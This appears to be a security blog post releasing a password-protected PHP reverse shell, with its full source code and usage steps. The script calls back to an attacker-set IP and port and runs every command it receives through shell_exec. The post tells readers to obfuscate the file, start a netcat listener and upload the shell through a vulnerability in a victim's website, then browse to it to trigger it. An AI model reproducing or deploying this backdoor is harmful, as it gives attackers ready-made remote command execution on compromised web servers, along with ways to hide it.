Reverse Shell v1.0 PHP – Authentication Feature

Introduction

 

This tool is designed for pentest situation where you have upload access to a webserver that is running PHP.
Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host and port defined in the script. Bound to this TCP connection will be a shell.
 

This will be a proper interactive shell in which you can run interective programs like Telnet and SSH.
This shell has an inbuilt authentication feature which prevents someone else from abusing your backdoor.
It differs from web form-based shell which allow you to send a single command, then return you the output.
 

Modify the source

 

1
2
3
$ip = "127.0.0.1"; #Change this to your Public IP
$port = 4444;      #Change this to your Port
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)

 

Change the values as per your need and situation.
 

Obfuscate The Source

 

Once you have done the modification, you may use any online PHP Obfuscator to encode the PHP script.
 

Example: http://www.codeeclipse.com/
 

Before obfuscating, please change the above values according to your needs.
 

Setup Netcat Listener

 

Start a Netcat listener on a host and port that will be accessible by the web server.
Use the same port here as you specified in the reverse shell script for example (4444):
 

1
root@bt:~# nc -lvvp 4444

 

Upload The Script And Execute It

 

Using the vulnerability discovered by you in the website, upload reverse_shell.php.
Run the script simply by browsing to the newly uploaded file in your web browser.
 

1
http://<Victim IP>/<Upload Path>/reverse_shell.php

 

Note: You will not see any output on the web page, it continue in waiting mode if its successful.
 

Loot with your shell

 

Source Code

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
#               Reverse Shell v1.0                #
#             Authentication Feature              #
#                                                 #
#            Hacksys Team - Panthera              #
#             Author: Ashfaq Ansari               #
#            hacksysteam@hotmail.com              #
#          http://hacksys.vfreaks.com             #
#              Designed for Linux                 #
#             Thanks to lionaneesh                #
#             lionaneesh@gmail.com                #
###################################################

ini_set('max_execution_time',0);

$VERSION = "1.0";
$ip = "127.0.0.1"; #Change this
$port = 4444;      #Change this
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)

$banner = ("
 _    _            _     _____            
| |  | |          | |   / ____|                            
| |__| | __ _  ___| | _| (___  _   _ ___
|  __  |/ _` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/
 _______                        __/ |                                
|__   __|                      |___/  
   | | ___  __ _ _ __ ___  
   | |/ _ \/ _` | '_ ` _ \
   | |  __/ (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    Author: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com/\n\n"
);

$pwd = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1');
$date = shell_exec("date");
$len = 1337;
$info =
("
System Information:\n$sysinfo
Current Working Directory: $pwd
User Group: $id
Current Date and Time: $date\n
"
);

print "\nTrying to connect to: $ip on port $port ...\n\n";

$sockfd = fsockopen($ip , $port , $errno, $errstr );

if($errno != 0)
  {
    print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
    die(0);
  }
else if (!$sockfd)
  {
    print "Fatal : An unexpected error was occured when trying to connect!\n";
  }
else
  {
    print "Connected to: $ip on port $port ...\n\n";
    fputs ($sockfd , $banner);
    fputs($sockfd ,"Enter Password: ");
    $getpass = trim(fgets($sockfd, strlen($password) + 2));

    if ($getpass == $password)
    {
      fputs($sockfd, "\nAuthentication Successfull..\n");
      fputs($sockfd, $info);
      while(!feof($sockfd))
      {
    $cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $command = trim(fgets($sockfd, $len));
        if (trim($command) == "exit")
    {
      fputs($sockfd ,"\nAborted by user... Exiting..." );
      fclose($sockfd);
      die(0);
    }
    fputs($sockfd , "\n" . shell_exec($command) . "\n");
      }
      fclose($sockfd);
      die(0);
    }
    else
    {
      fputs($sockfd ,"\nInvalid Password... Quitting...");
      fclose($sockfd);
      die(0);
    }
  }
?>

 

Screenshot

 


 

Download Reverse Shell v1.0 PHP – Authentication Feature

 

[tweet2download file=”Reverse_Shell_v1.0.zip” tweet=”#ReverseShellPHPv1.0 Inbuilt authentication. %%post-url%%” follow=”@HackSysTeam” /]

 
 
 

22,612 total views, 2 views today

The following two tabs change content below.

Ashfaq Ansari

Security Researcher
Ashfaq Ansari is the founder of HackSys Team code named "Panthera". He is a Security Researcher with experience in various aspects of Information Security. He has authored "HackSys Extreme Vulnerable Driver" and "Shellcode of Death". He has also written and published various whitepapers on low level software exploitation. His core interest lies in "Low Level Exploitation", "Reverse Engineering", "Program Analysis" and "Hybrid Fuzzing". He is a fanboy of Artificial Intelligence and Machine Learning. He is the chapter lead for null Pune.

Latest posts by Ashfaq Ansari (see all)

Leave a Reply

Your email address will not be published. Required fields are marked *